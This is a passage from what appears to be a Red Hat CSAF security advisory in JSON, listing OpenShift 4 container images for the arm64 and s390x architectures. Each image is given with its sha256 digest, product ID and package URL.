"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3A1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846012"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3A991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850085"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107_arm64",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3A27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846889"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3A6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849462"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3A9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844510"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3A08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846313"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:b73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:b73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:b73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3Ab73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847717"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3A53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773852900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff_arm64",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff_arm64",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3A32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849752"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860_arm64",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849096"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57_arm64",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3A3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848264"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850280"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3A61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3A81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846285"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:f39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:f39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:f39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3Af39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849686"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:b45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:b45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:b45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3Ab45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845326"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3A2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846658"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779_arm64",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3A18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844591"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6_arm64",
"product_id": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/volume-data-source-validator-rhel9@sha256%3A4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847698"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849291"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439_s390x",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439_s390x",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3A81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849087"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb_s390x",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3A5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846847"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6_s390x",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3A7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844452"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3A03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844519"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848375"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3A9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3A0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:fd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:fd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:fd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Afd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:edad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:edad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:edad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3Aedad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844901"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:f70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:f70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:f70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3Af70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846560"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3A7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846629"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3A0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845313"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3A8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848132"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:f607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051_s390x",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:f607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051_s390x",
